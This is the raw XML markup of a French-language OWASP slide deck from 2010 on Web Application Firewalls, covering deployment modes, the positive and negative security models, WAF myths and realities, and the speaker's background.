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44"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId45"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="375" r:id="rId3"/>
    <p:sldId id="331" r:id="rId4"/>
    <p:sldId id="327" r:id="rId5"/>
    <p:sldId id="332" r:id="rId6"/>
    <p:sldId id="371" r:id="rId7"/>
    <p:sldId id="304" r:id="rId8"/>
    <p:sldId id="303" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="333" r:id="rId11"/>
    <p:sldId id="325" r:id="rId12"/>
    <p:sldId id="350" r:id="rId13"/>
    <p:sldId id="351" r:id="rId14"/>
    <p:sldId id="373" r:id="rId15"/>
    <p:sldId id="338" r:id="rId16"/>
    <p:sldId id="334" r:id="rId17"/>
    <p:sldId id="339" r:id="rId18"/>
    <p:sldId id="340" r:id="rId19"/>
    <p:sldId id="335" r:id="rId20"/>
    <p:sldId id="341" r:id="rId21"/>
    <p:sldId id="372" r:id="rId22"/>
    <p:sldId id="342" r:id="rId23"/>
    <p:sldId id="344" r:id="rId24"/>
    <p:sldId id="346" r:id="rId25"/>
    <p:sldId id="358" r:id="rId26"/>
    <p:sldId id="359" r:id="rId27"/>
    <p:sldId id="360" r:id="rId28"/>
    <p:sldId id="364" r:id="rId29"/>
    <p:sldId id="362" r:id="rId30"/>
    <p:sldId id="363" r:id="rId31"/>
    <p:sldId id="374" r:id="rId32"/>
    <p:sldId id="367" r:id="rId33"/>
    <p:sldId id="368" r:id="rId34"/>
    <p:sldId id="354" r:id="rId35"/>
    <p:sldId id="352" r:id="rId36"/>
    <p:sldId id="353" r:id="rId37"/>
    <p:sldId id="355" r:id="rId38"/>
    <p:sldId id="356" r:id="rId39"/>
    <p:sldId id="357" r:id="rId40"/>
    <p:sldId id="336" r:id="rId41"/>
    <p:sldId id="293" r:id="rId42"/>
    <p:sldId id="34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-65" charset="0"/>
        <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-65" charset="-128"/>
        <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-65" charset="-128"/>
        <a:sym typeface="Arial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ADADAD"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="CC0000"/>
    <a:srgbClr val="00FF01"/>
    <a:srgbClr val="25669C"/>
    <a:srgbClr val="FCFC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3583" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="-984" y="-88"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1056"/>
        <p:guide pos="47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 varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="-19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6BFF0093-6094-7845-A0A1-884A132CEDAD}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>15/01/10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ヒラギノ角ゴ ProN W3" pitchFamily="-112" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-112" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="-112" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9626969B-C163-3040-9780-A10BE02D9D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Text Box 2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84813" cy="4208463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81196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8119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Tahom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pitchFamily="-65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2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pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="13319" name="Picture 3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820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/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="6270625"/>
            <a:ext cx="35179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0" bIns="0">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="969696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© 2009 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="969696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S.Gioria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="969696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 &amp; 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ransition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  <a:sym typeface="Tahoma" pitchFamily="-65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65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65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65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65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112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112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112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2" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-112" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-112" charset="-128"/>
          <a:sym typeface="Tahoma" pitchFamily="-112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ebdings" pitchFamily="-65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  <a:sym typeface="Tahoma" pitchFamily="-65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ebdings" pitchFamily="-65" charset="2"/>
        <a:buChar char="4"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Tahoma" pitchFamily="-65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ahoma" pitchFamily="-65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ahoma" pitchFamily="-65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ahoma" pitchFamily="-65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ahoma" pitchFamily="-65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ahoma" pitchFamily="-65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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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ahoma" pitchFamily="-112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hyperlink" Target="mailto:dave.wichers@owasp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fforwimps.or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wasp.org/index.php/Web_Application_Firewall" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcisecuritystandard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RESIST – Toulouse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>14 Janvier 2010</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/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3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5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5165725"/>
            <a:ext cx="42037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0" bIns="0">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="969696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Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Copyright © 2009 - The OWASP Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="969696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Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27655" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks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6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks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843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7" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks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8" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks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058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9" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks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5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0" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks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058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1" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks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058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2" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks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3" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5937250"/>
            <a:ext cx="48133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0" bIns="0">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA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Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>The OWASP Foundation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27664" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks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058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5" name="AutoShape 16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9095" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21411" y="10636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="41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339933">
              <a:alpha val="3254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6" name="AutoShape 17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9095" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21411" y="10636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="41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339933">
              <a:alpha val="3254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038600" y="6326188"/>
            <a:ext cx="4813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0" bIns="0">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA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Tahoma" pitchFamily="-65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Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27669" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547813" y="4076700"/>
            <a:ext cx="4679950" cy="1727200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="132040"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef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Sébastien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Gioria (French Chapter Leader &amp; OWASP Global Education </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Comittee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Member)</a:t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sebastien.gioria@owasp.org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3103563" y="1143000"/>
            <a:ext cx="588803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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="Arial" pitchFamily="-65" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Web Application Firewalls (WAF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea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rgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’OWASP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Web Application Firewalls (WAF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Choisir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Mythes et réalités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mode d’emploi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S’amuser avec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Et après ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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AF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3604"/>
            <a:ext cx="7010400" cy="4922396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Mode Parallèle/Sonde </a:t>
            </a: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Mode Intrusif/Reverse Proxy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WA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2" y="1828800"/>
            <a:ext cx="8370188" cy="43742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Intégré au serveur Web (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mod_security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> d’Apache)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3" descr="WAF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858001" cy="38841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Intégré au Code/a l’applicatif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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Disponible dans l’OWASP ESAPI Uniquement !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Se base sur des règles configurables à la volée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Proche du code, et peut donc gérer les entrées + sorties. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 6" descr="OWASP_ESAPI_Top_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WASP_ESAPI_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63612"/>
            <a:ext cx="4606925" cy="345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2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Choisir son WAF/son camp</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="52578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s-ES" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="336699"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="73949" name="Group 221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600" cy="5181600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1448030"/>
                <a:gridCol w="3311256"/>
                <a:gridCol w="3470314"/>
              </a:tblGrid>
              <a:tr h="582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Négatif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Positif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113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Concept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Le WAF reconnait les attaques et les bloque, il  autorise tous les accès.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Le WAF connait le trafic légitime et rejette tout le reste.</a:t>
                      </a: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</a:tr>
              <a:tr h="172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Avantages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Aucun besoin de personnalisation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Protection standard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Simple a déployer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 Bloque les attaques inconnues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 N’est pas dépendant d’une base de signature.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Détection précise</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="es-E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</a:tr>
              <a:tr h="1730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65" charset="0"/>
                        </a:rPr>
                        <a:t>Inconvénients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Extrèmement dépendant des signatures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Pas très précis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Configuration complexe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 Sensible aux faux positifs</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="es-E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144000" marR="144000" marT="144000" marB="144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rgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’OWASP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Web Application Firewalls (WAF)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Choisir son WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>WAF Mythes et réalités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mode d’emploi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S’amuser avec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Et après ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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Réalités du WAF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fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Patcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> virtuellement les problèmes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Plus ou moins efficace suivant la méthode employée (positive, négative)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Cacher tout ou partie de l’infrastructure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En mode reverse proxy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Analyseur de trafic HTTP/HTTPS/XML puissant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Grace à ses fonctions de normalisation et son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>reporting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Mythes du WAF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fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>C’est un nouvel élément d’infrastructure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Couts supplémentaires, à intégrer en PCA, …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Compétence supplémentaire…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Source de problèmes récurrents :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Modèle positif : à chaque modification de l’applicatif </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Modèle négatif : dépendant des mises a jours.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Complexifie le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>debug</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ce n’est pas la solution!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Il « laisse » passer des failles (Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, élévation de privilèges, HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>splitting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, …)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Il n’est pas (encore) obligatoire en PCI-DSS !</a:t>
            </a:r>
          </a:p>
          <a:p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rgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’OWASP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Web Application Firewalls (WAF)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Choisir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Mythes et réalités</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>WAF mode d’emploi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S’amuser avec son WAF</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Et après ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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9362" y="368300"/>
            <a:ext cx="7208838" cy="612775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>Qui suis-je ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" b="0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2438400" y="2730500"/>
            <a:ext cx="6046787" cy="1841500"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>+12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>d’expérience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Sécurité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Systèmes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>d’Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Différents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>postes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> de manager SSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>banque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>l’assurance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>télécoms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Expertise Technique </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-550863" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>PenTesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, Digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-550863" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>S-SDLC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-550863" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Gestion du risque, Architectures fonctionnelles, Audits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-550863" algn="just" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Consulting et Formation en Réseaux et Sécurité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gray">
          <a:xfrm>
            <a:off x="2411413" y="1295400"/>
            <a:ext cx="6427787" cy="990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85750" indent="-285750" algn="just" defTabSz="622300" eaLnBrk="0" hangingPunct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80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Consultant Sécurité au sein du cabinet de commissaires aux comptes Groupe Y (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>s.gioria@groupey.fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
